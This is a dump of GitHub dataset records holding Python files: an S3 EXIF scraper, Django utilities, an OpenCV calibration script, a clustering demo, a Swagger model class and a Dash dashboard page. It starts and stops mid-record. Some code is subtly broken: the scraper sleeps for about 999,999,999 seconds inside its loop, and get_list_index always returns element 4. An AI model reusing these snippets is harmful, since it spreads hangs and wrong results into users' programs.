navigates\nto each key. It attempts to download and pare the key\nof each file, skipping the key when it fails.\n\nIt uses an port of the Python Image Library to process\nbinary data retrieved from the S3 bucket. It then uses\nthe local db module to store the metadata and EXIF data\nof the image in the database.\n\nCurrently, it is tightly coupled to the waldo-recruting\nS3 bucket, and could use a layer of abstraction around\nimage locations.\n'''\n\n#Standard library modules\nimport time\nimport xml.etree.ElementTree as ET\nfrom io import BytesIO\nfrom os.path import splitext\n\n#Dependency modules\nimport requests\nfrom PIL import Image, ExifTags\n\n#Local modules\nfrom db import ImageDatabase as ID\n\nS3_DOCS = '{http://s3.amazonaws.com/doc/2006-03-01/}'\nBUCKET_URL = 'http://s3.amazonaws.com/waldo-recruiting'\n\n#Downloads the images from the S3 bucket\ndef run():\n #Setup database\n db = ID()\n db.setup()\n\n resp = requests.get(BUCKET_URL)\n bucket_result = ET.fromstring(resp.text)\n contents_elems = bucket_result.findall('%sContents' % S3_DOCS)\n for e in contents_elems:\n filename = e.find('%sKey' % S3_DOCS).text\n print('Inserting ', filename)\n url = \"%s/%s\" % (BUCKET_URL, filename)\n try:\n photo = Image.open(BytesIO(requests.get(url).content))\n except OSError as e:\n print(filename, ' failed to open. Skipping...')\n continue\n\n photo_id = db.insert_photo(\n url,\n filename,\n splitext(filename)[1],\n photo.height,\n photo.width\n )\n try:\n photo_exif = photo._getexif()\n except AttributeError as ae:\n print(filename, \"has no exif data. Keeping image and skipping exif\")\n continue\n for tag_no, value in photo_exif.items():\n try:\n tag_name = ExifTags.TAGS[tag_no]\n except KeyError as ke:\n print(\"Exif tag not recognized. Skipping...\")\n continue\n \n #Bad values are currently being skipped. A future improvement\n #could handle bad values more gracefully by working with\n #database schema improvements to work with specific data\n #more directly.\n print(\"Adding\", tag_name, \"to photo\", photo_id, \"-\", value)\n try:\n db.insert_exif(photo_id, tag_no, ExifTags.TAGS[tag_no], value)\n except ValueError as ve:\n print(tag_name, \"had a bad value. Skipping...\")\n continue\n print(filename, ' successfully inserted')\n time.sleep(999999999)\n\nif __name__ == '__main__':\n run()\n", "repo_name": "downpat/exif-scraper", "sub_path": "scraper/scrape.py", "file_name": "scrape.py", "file_ext": "py", "file_size_in_byte": 2746, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "db.ImageDatabase", "line_number": 37, "usage_type": "call"}, {"api_name": "db.setup", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 41, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 41, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 48, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 48, "usage_type": "call"}, {"api_name": "db.insert_photo", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 67, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 67, "usage_type": "name"}, {"api_name": "db.insert_exif", "line_number": 78, "usage_type": "call"}, {"api_name": "PIL.ExifTags.TAGS", "line_number": 78, "usage_type": "attribute"}, {"api_name": "PIL.ExifTags", "line_number": 78, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "26380597293", "text": "from django.core.files.storage import FileSystemStorage\nfrom django.conf import settings\nfrom .authentication import *\nfrom io import StringIO\nfrom rest_framework.parsers import JSONParser\nimport json\n\nclass OverwiteStorageSystem(FileSystemStorage):\n \n def get_available_name(self, name, max_length=None):\n # if the file name already exists, remove it as if it was a true file system\n if self.exists(name):\n self.delete(name)\n return super().get_available_name(name, max_length)\n\n\ndef range_with_floats(start, stop, step=1):\n while stop > start:\n yield start\n start += step\n\ndef get_host_name(request):\n if request.is_secure():\n return f'https://{request.get_host()}'\n return f'http://{request.get_host()}'\n\n\ndef get_list_index(list, index, default):\n try:\n return list[4]\n except IndexError:\n return default\n", "repo_name": "samuelitwaru/wex-erp", "sub_path": "utils/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 897, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "12191640907", "text": "import cv2\nfrom cv2 import drawChessboardCorners\nimport numpy as np\ncap = cv2.VideoCapture(0)\npic = []\n\nobjp = np.zeros((9*6,3), np.float32)\n# for i in range(6):\n# for j in range(9):\n# objp[i*9+j]=(i,j,0)\n\nobjp[:, :2]=np.mgrid[0:9, 0:6].T.reshape(-1, 2)\nprint(objp)\nobjpoints = []\nimgpoints = []\nwhile len(objpoints) < 50:\n ret, frame = cap.read()\n h,w = frame.shape[:2]\n gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n ret2, corner = cv2.findChessboardCorners(gray_frame, (9,6))\n cv2.imshow(\"frame\", frame)\n cv2.waitKey(33)\n if ret2:\n corner2 = cv2.cornerSubPix(gray_frame,corner, (11,11), (-1,-1), (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.1))\n objpoints.append(objp.copy())\n imgpoints.append(corner2)\n drawn_frame = drawChessboardCorners(frame, (9, 6), corner2, ret2)\n cv2.imshow(\"frame\", drawn_frame)\n cv2.waitKey(33)\n\nret, cameraMatrix, distCoeffs, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, (h, w), None, None)\nf = cv2.FileStorage(\"calibrate.xml\", cv2.FILE_STORAGE_WRITE)\nf.write(\"intrinsic\", cameraMatrix)\nf.write(\"distortion\", distCoeffs)\nf.release()", "repo_name": "jayin92/NYCU-cv-and-uav", "sub_path": "lab04/camerea_cali.py", "file_name": "camerea_cali.py", "file_ext": "py", "file_size_in_byte": 1171, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.VideoCapture", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.cornerSubPix", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.TERM_CRITERIA_EPS", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.TERM_CRITERIA_MAX_ITER", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 28, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.FileStorage", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.FILE_STORAGE_WRITE", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "24656845249", "text": "# © 2023, Universität Bern, Chair of Quantitative Methods, Vanessa Tran, Manuel Kammermann, Philipp Baumann\n\nimport pandas as pd\nimport numpy as np\nfrom mpfcc_algorithm import mpfcc\nimport matplotlib.pyplot as plt\n\n# Read data of illustrative example\ndf = pd.read_csv('illustrative_example.csv')\n\n# Extract features and colors\nX = df.values[:, 1:-1]\ncolors = df.values[:, -1].astype(int)\n\n# Define parameters\nnumber_of_clusters = 3\nmax_cardinality = 11\nmin_balance = 1\n\n# Run MPFCC-Algorithm\nlabels = mpfcc(X, colors, number_of_clusters, max_cardinality, min_balance,\n random_state=24, mpfcc_time_limit=300)\n\n# Visualize resulting partition\ncenters = np.unique(labels)\nplt.scatter(X[:, 0], X[:, 1], c=np.array(['red', 'blue'])[colors], s=30, zorder=10)\nfor i in range(X.shape[0]):\n plt.plot([X[i, 0], X[labels[i], 0]], [X[i, 1], X[labels[i], 1]],\n color='black', linewidth=0.8, zorder=-1, alpha=0.2)\nplt.show()\n", "repo_name": "phil85/MPFCC-Algorithm", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "mpfcc_algorithm.mpfcc", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "1104321639", "text": "# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.account_identifier import AccountIdentifier # noqa: F401,E501\nfrom swagger_server.models.amount import Amount # noqa: F401,E501\nfrom swagger_server.models.coin_change import CoinChange # noqa: F401,E501\nfrom swagger_server.models.operation_identifier import OperationIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass Operation(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, operation_identifier: OperationIdentifier=None, related_operations: List[OperationIdentifier]=None, type: str=None, status: str=None, account: AccountIdentifier=None, amount: Amount=None, coin_change: CoinChange=None, metadata: object=None): # noqa: E501\n \"\"\"Operation - a model defined in Swagger\n\n :param operation_identifier: The operation_identifier of this Operation. # noqa: E501\n :type operation_identifier: OperationIdentifier\n :param related_operations: The related_operations of this Operation. # noqa: E501\n :type related_operations: List[OperationIdentifier]\n :param type: The type of this Operation. # noqa: E501\n :type type: str\n :param status: The status of this Operation. # noqa: E501\n :type status: str\n :param account: The account of this Operation. # noqa: E501\n :type account: AccountIdentifier\n :param amount: The amount of this Operation. # noqa: E501\n :type amount: Amount\n :param coin_change: The coin_change of this Operation. # noqa: E501\n :type coin_change: CoinChange\n :param metadata: The metadata of this Operation. # noqa: E501\n :type metadata: object\n \"\"\"\n self.swagger_types = {\n 'operation_identifier': OperationIdentifier,\n 'related_operations': List[OperationIdentifier],\n 'type': str,\n 'status': str,\n 'account': AccountIdentifier,\n 'amount': Amount,\n 'coin_change': CoinChange,\n 'metadata': object\n }\n\n self.attribute_map = {\n 'operation_identifier': 'operation_identifier',\n 'related_operations': 'related_operations',\n 'type': 'type',\n 'status': 'status',\n 'account': 'account',\n 'amount': 'amount',\n 'coin_change': 'coin_change',\n 'metadata': 'metadata'\n }\n self._operation_identifier = operation_identifier\n self._related_operations = related_operations\n self._type = type\n self._status = status\n self._account = account\n self._amount = amount\n self._coin_change = coin_change\n self._metadata = metadata\n\n @classmethod\n def from_dict(cls, dikt) -> 'Operation':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Operation of this Operation. # noqa: E501\n :rtype: Operation\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def operation_identifier(self) -> OperationIdentifier:\n \"\"\"Gets the operation_identifier of this Operation.\n\n\n :return: The operation_identifier of this Operation.\n :rtype: OperationIdentifier\n \"\"\"\n return self._operation_identifier\n\n @operation_identifier.setter\n def operation_identifier(self, operation_identifier: OperationIdentifier):\n \"\"\"Sets the operation_identifier of this Operation.\n\n\n :param operation_identifier: The operation_identifier of this Operation.\n :type operation_identifier: OperationIdentifier\n \"\"\"\n if operation_identifier is None:\n raise ValueError(\"Invalid value for `operation_identifier`, must not be `None`\") # noqa: E501\n\n self._operation_identifier = operation_identifier\n\n @property\n def related_operations(self) -> List[OperationIdentifier]:\n \"\"\"Gets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :return: The related_operations of this Operation.\n :rtype: List[OperationIdentifier]\n \"\"\"\n return self._related_operations\n\n @related_operations.setter\n def related_operations(self, related_operations: List[OperationIdentifier]):\n \"\"\"Sets the related_operations of this Operation.\n\n Restrict referenced related_operations to identifier indices < the current operation_identifier.index. This ensures there exists a clear DAG-structure of relations. Since operations are one-sided, one could imagine relating operations in a single transfer or linking operations in a call tree. # noqa: E501\n\n :param related_operations: The related_operations of this Operation.\n :type related_operations: List[OperationIdentifier]\n \"\"\"\n\n self._related_operations = related_operations\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :return: The type of this Operation.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Operation.\n\n Type is the network-specific type of the operation. Ensure that any type that can be returned here is also specified in the NetworkOptionsResponse. This can be very useful to downstream consumers that parse all block data. # noqa: E501\n\n :param type: The type of this Operation.\n :type type: str\n \"\"\"\n if type is None:\n raise ValueError(\"Invalid value for `type`, must not be `None`\") # noqa: E501\n\n self._type = type\n\n @property\n def status(self) -> str:\n \"\"\"Gets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :return: The status of this Operation.\n :rtype: str\n \"\"\"\n return self._status\n\n @status.setter\n def status(self, status: str):\n \"\"\"Sets the status of this Operation.\n\n Status is the network-specific status of the operation. Status is not defined on the transaction object because blockchains with smart contracts may have transactions that partially apply (some operations are successful and some are not). Blockchains with atomic transactions (all operations succeed or all operations fail) will have the same status for each operation. On-chain operations (operations retrieved in the `/block` and `/block/transaction` endpoints) MUST have a populated status field (anything on-chain must have succeeded or failed). However, operations provided during transaction construction (often times called \\\"intent\\\" in the documentation) MUST NOT have a populated status field (operations yet to be included on-chain have not yet succeeded or failed). # noqa: E501\n\n :param status: The status of this Operation.\n :type status: str\n \"\"\"\n\n self._status = status\n\n @property\n def account(self) -> AccountIdentifier:\n \"\"\"Gets the account of this Operation.\n\n\n :return: The account of this Operation.\n :rtype: AccountIdentifier\n \"\"\"\n return self._account\n\n @account.setter\n def account(self, account: AccountIdentifier):\n \"\"\"Sets the account of this Operation.\n\n\n :param account: The account of this Operation.\n :type account: AccountIdentifier\n \"\"\"\n\n self._account = account\n\n @property\n def amount(self) -> Amount:\n \"\"\"Gets the amount of this Operation.\n\n\n :return: The amount of this Operation.\n :rtype: Amount\n \"\"\"\n return self._amount\n\n @amount.setter\n def amount(self, amount: Amount):\n \"\"\"Sets the amount of this Operation.\n\n\n :param amount: The amount of this Operation.\n :type amount: Amount\n \"\"\"\n\n self._amount = amount\n\n @property\n def coin_change(self) -> CoinChange:\n \"\"\"Gets the coin_change of this Operation.\n\n\n :return: The coin_change of this Operation.\n :rtype: CoinChange\n \"\"\"\n return self._coin_change\n\n @coin_change.setter\n def coin_change(self, coin_change: CoinChange):\n \"\"\"Sets the coin_change of this Operation.\n\n\n :param coin_change: The coin_change of this Operation.\n :type coin_change: CoinChange\n \"\"\"\n\n self._coin_change = coin_change\n\n @property\n def metadata(self) -> object:\n \"\"\"Gets the metadata of this Operation.\n\n\n :return: The metadata of this Operation.\n :rtype: object\n \"\"\"\n return self._metadata\n\n @metadata.setter\n def metadata(self, metadata: object):\n \"\"\"Sets the metadata of this Operation.\n\n\n :param metadata: The metadata of this Operation.\n :type metadata: object\n \"\"\"\n\n self._metadata = metadata\n", "repo_name": "xanimo/rosetta-api", "sub_path": "server/python-flask-server-generated/swagger_server/models/operation.py", "file_name": "operation.py", "file_ext": "py", "file_size_in_byte": 10337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "swagger_server.models.base_model_.Model", "line_number": 16, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 21, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 43, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 46, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 47, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 48, "usage_type": "name"}, {"api_name": "swagger_server.util.deserialize_model", "line_number": 80, "usage_type": "call"}, {"api_name": "swagger_server.util", "line_number": 80, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 83, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 93, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 106, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.operation_identifier.OperationIdentifier", "line_number": 117, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 177, "usage_type": "name"}, {"api_name": "swagger_server.models.account_identifier.AccountIdentifier", "line_number": 187, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 198, "usage_type": "name"}, {"api_name": "swagger_server.models.amount.Amount", "line_number": 208, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 219, "usage_type": "name"}, {"api_name": "swagger_server.models.coin_change.CoinChange", "line_number": 229, "usage_type": "name"}]} +{"seq_id": "9855663672", "text": "import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.dependencies import Input,Output,State,MATCH,ALL\nimport pandas as pd\nimport pickle as pkl\nimport os\nimport base64\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport json\nfrom flask import Flask\nimport math\nfrom dash_extensions.snippets import send_data_frame\nfrom dash_extensions import Download\nfrom collections import OrderedDict\nimport time\n\nline_fig=go.Figure()\ntext_font_size='1.7vh'\nnavbar_font_size='2vh'\nheader_font_size='2vh'\n\n\n# the div where the flow line chart will be inside it\n# dcc.Graph src : https://www.youtube.com/watch?v=G8r2BB3GFVY\n\nline_div=html.Div([\n dcc.Graph(id='flow_line_chart', config={'displayModeBar': True, 'scrollZoom': True,'displaylogo': False},\n style=dict(height='45vh',backgroundColor='#20374c') ,figure=line_fig\n ) ] ,id='flow_line_div'\n )\n\n\n# dropdown menu of resolutions\n# dcc.dropdown src : https://dash.plotly.com/dash-core-components/dropdown\n# note that i added some pure css to the all dropdowns in custom css file\n\nresolution_menu= dcc.Dropdown(\n id='flow_resolution_menu',\n options=[\n dict(label='Mean Agg. Quarterly', value='Mean Agg. Quarterly'), dict(label='Sum Agg. Quarterly', value='Sum Agg. Quarterly'),\n dict(label='Mean Agg. Monthly', value='Mean Agg. Monthly'), dict(label='Sum Agg. Monthly', value='Sum Agg. Monthly'),\n dict(label='Mean Agg. Daily', value='Mean Agg. Daily'), dict(label='Sum Agg. Daily', value='Sum Agg. Daily'),\n dict(label='Hourly', value='Hourly')\n ],\n value='Mean Agg. Quarterly' , style=dict(color='#0f2537',fontWeight='bold',textAlign='center',\n width='20vh',backgroundColor='#0f2537',border='1px solid #00bfff')\n )\n\n# text apears above resolution dropdown\nresolution_text=html.Div(html.H1('Resolution',\n style=dict(fontSize=text_font_size,fontWeight='bold',color='white',marginTop='')),\n style=dict(display='inline-block',marginLeft='',textAlign=\"center\",width='100%'))\n\n# the div that contains both the text and dropdown of resolution\nresolution_menu_div= html.Div([resolution_text,resolution_menu],\n style=dict( fontSize=text_font_size,\n marginLeft='2vh',marginBottom='',display='inline-block'))\n\n# the button that is pressed on to download data as csv\n# dbc.Button src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/button/\ndownload_csv=html.Div([dbc.Button(\"Download CSV\", color=\"primary\", size='lg', n_clicks=0,id=\"flow_download_csv\"\n ,style=dict(fontSize='1.6vh')\n )],style=dict(display='inline-block',marginLeft='2vh',marginTop='3%'))\n\n# dash Download component that handles downloading process from browser to device\n# Download component src : https://dash.plotly.com/dash-core-components/download\ncsv_download_data=html.Div([Download(id=\"flow_csv_download_data\")])\n\n# the function that create the flow page layout when pressing on page from navigation bar\ndef creat_flow_layout():\n with open(\"Flow_20220208.pickle\", \"rb\") as f:\n object = pkl.load(f)\n df_marks = object['DEU_FRA'] # getting a dataframe from pickle file to be used to get years range of data to be used in years slider later\n\n countries = list(object.keys()) # get countries which are keys of pickle dictionery to be used in countries dropdown menu\n object=None\n\n # list of scenarios to be used in scenarios check boxes later\n scenarios = ['Normal','1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015','Exp']\n\n # dropdown of countries\n country_menu = dcc.Dropdown(className=\"custom-dropdown\",\n id='flow_country_menu',\n\n options=[{'label': country, 'value': country} for country in countries] # get all countries from countries list\n ,\n value=countries[0],\n style=dict(color='#0f2537', fontWeight='bold', textAlign='center',\n width='20vh', backgroundColor='#0f2537', border='1px solid #00bfff')\n )\n\n country_text = html.Div(html.H1('Countries',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"center\", width='100%'))\n\n country_menu_div = html.Div([country_text, country_menu],\n style=dict(fontSize=text_font_size,\n marginLeft='', marginBottom='', display='inline-block'))\n\n scenarios_text = html.Div(html.H1('Scenarios',\n style=dict(fontSize=text_font_size, fontWeight='bold', color='white',\n marginTop='')),\n style=dict(display='inline-block', marginLeft='', textAlign=\"left\", width='100%'))\n\n # the check boxes element , src : https://dash-bootstrap-components.opensource.faculty.ai/docs/components/input/\n scenarios_list = dbc.Checklist(\n inline=True,\n options=[{'label': scenario, 'value': scenario} for scenario in scenarios] # get all scenarios from scenarios list\n ,\n value=[scenarios[0]], label_style=dict(fontSize='1.5vh'),\n id=\"flow_scenarios_list\", style=dict(fontSize='2vh', marginLeft='0', color='white')\n )\n\n bar_fig=go.Figure(go.Bar())\n\n bar_div = html.Div([\n dcc.Graph(id='flow_bar_chart', config={'displayModeBar': True, 'scrollZoom': True, 'displaylogo': False},\n style=dict(height='60vh', backgroundColor='#20374c'), figure=bar_fig\n )], id='bar_div'\n )\n\n\n\n # create new column of only years by getting the years from date column using pd.DatetimeIndex() function\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DatetimeIndex.year.html\n df_marks['Year'] = (pd.DatetimeIndex(df_marks.iloc[:, 26]).year).astype(str)\n # converting years column to int type\n df_marks['Year']=df_marks['Year'].astype('int32')\n # converting years column to list\n years=df_marks['Year'].to_list()\n # removing repeated years from years list\n years=list(OrderedDict.fromkeys(years))\n # setting the slider years marks from the years list\n marks_values={year: {'label': '{}'.format(year), 'style': {'color': 'white'}} for year in years}\n # dcc.RangeSlider src : https://dash.plotly.com/dash-core-components/rangeslider\n years_slider=html.Div([dcc.RangeSlider(min=years[0], max=years[-1], step=1, value=[years[1],years[-2]], marks=marks_values ,id='flow_bar_slider')\n ])\n\n # layout to be returned\n\n layout = [dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([line_div], size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False)\n , html.Br(), html.Div([country_menu_div, resolution_menu_div, download_csv],\n style={'width': '100%', 'display': 'flex', 'align-items': 'center',\n 'justify-content': 'center'}),\n html.Br(), scenarios_text, scenarios_list, csv_download_data,\n dcc.Store(id='flow_data', data=pd.DataFrame().to_dict('records'))\n\n ], style=dict(height='75vh'))])\n , style=dict(backgroundColor='#20374c')), html.Br()\n ], xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)),\n\n dbc.Col([dbc.Card(dbc.CardBody(\n [html.Div([dbc.Spinner([bar_div],size=\"lg\", color=\"primary\", type=\"border\", fullscreen=False ),html.Br(),years_slider\n\n ], style=dict(height='75vh'))])\n\n\n\n , style=dict(backgroundColor='#20374c',height='77vh')), html.Br()],\n\n xl=dict(size=6, offset=0), lg=dict(size=6, offset=0),\n md=dict(size=10, offset=1), sm=dict(size=10, offset=1), xs=dict(size=10, offset=1)\n\n )\n\n ]\n return layout\n\n# function used in callback in app.py that returns the flow bar figure\n# it takes input of pickle file dictionery and slider range value\ndef create_flow_bar_fig(object,years_range):\n\n countries = list(object.keys()) # get countries names\n normal_scenario_mean = [] # list that will be filled with top 5 countries with normal scenario mean\n countries_list = [] # list of top 5 country names\n normal_df = pd.DataFrame() # the new dataframe that will be filled with the previos values to be used in bar figure\n\n # looping through all countries names\n for country in countries:\n\n df = object[country] # get the dataframe of the related country\n\n df=df[(df['Date'].dt.year>=years_range[0]) & (df['Date'].dt.year<=years_range[1])] # get the data only in between the ranges of slider\n # src : https://stackoverflow.com/questions/46878156/pandas-filter-dataframe-rows-with-a-specific-year\n\n df.set_index('Date', inplace=True)\n df.columns = ['1991', '1992', '1993', '1994', '1995', '1996', '1997',\n '1998', '1999', '2000', '2001', '2002', '2003', '2004',\n '2005', '2006', '2007', '2008', '2009', '2010', '2011',\n '2012', '2013', '2014', '2015', 'Normal']\n mean_power = df['Normal'].mean()\n normal_scenario_mean.append(mean_power) #append the normal scenario mean power value to the list\n countries_list.append(country) # append the country name to the list\n\n object=None\n # add these lists in the new dataframe as columnbs\n normal_df['countries'] = countries_list\n normal_df['normal_scenario_mean'] = normal_scenario_mean\n # sort the values from larger to smaller\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.sort_values.html\n normal_df.sort_values(by='normal_scenario_mean', inplace=True, ascending=False)\n # get the top 5 values with relevent countries\n # src : https://pandas.pydata.org/docs/reference/api/pandas.DataFrame.nlargest.html\n normal_df = normal_df.nlargest(5, 'normal_scenario_mean')\n # print(normal_df)\n normal_df['normal_scenario_mean'] = normal_df['normal_scenario_mean'].astype('int64') # convert values from float to int\n\n # create horizontal bar chart of top 5\n # src : https://plotly.com/python/horizontal-bar-charts/\n bar_fig = go.Figure(data=[\n go.Bar(name='mean power', x=normal_df['normal_scenario_mean'], y=normal_df['countries'].to_list(),\n marker_color='#00bfff', text=normal_df['normal_scenario_mean'],\n textposition='outside', textfont=dict(\n size=15,\n color=\"white\"\n ), orientation='h')\n ])\n\n bar_fig.update_layout(\n title='Top 5 countries of mean power for normal scenario', xaxis_title='MWh/h',\n yaxis_title='Interconnection with neighbouring countries',\n font=dict(size=14, family='Arial', color='white'), hoverlabel=dict(\n font_size=14, font_family=\"Rockwell\", font_color='white', bgcolor='#20374c'), plot_bgcolor='#20374c',\n paper_bgcolor='#20374c' ,margin=dict(l=0, r=10, t=40, b=0)\n\n )\n # ,categoryorder='category descending'\n bar_fig.update_xaxes(showgrid=False, showline=True, zeroline=False)\n bar_fig.update_yaxes(showgrid=False, showline=True, zeroline=False, autorange=\"reversed\")\n\n return bar_fig\n", "repo_name": "rodiscience/ML-model-dashboard", "sub_path": "assets/Final/flow_page.py", "file_name": "flow_page.py", "file_ext": "py", "file_size_in_byte": 12185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "53", "api": [{"api_name": "plotly.graph_objects.Figure", "line_number": 20, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 20, "usage_type": "name"}, {"api_name": "dash_html_components.Div", "line_number": 29, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 30, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 40, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.H1", "line_number": 53, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 58, "usage_type": "call"}, 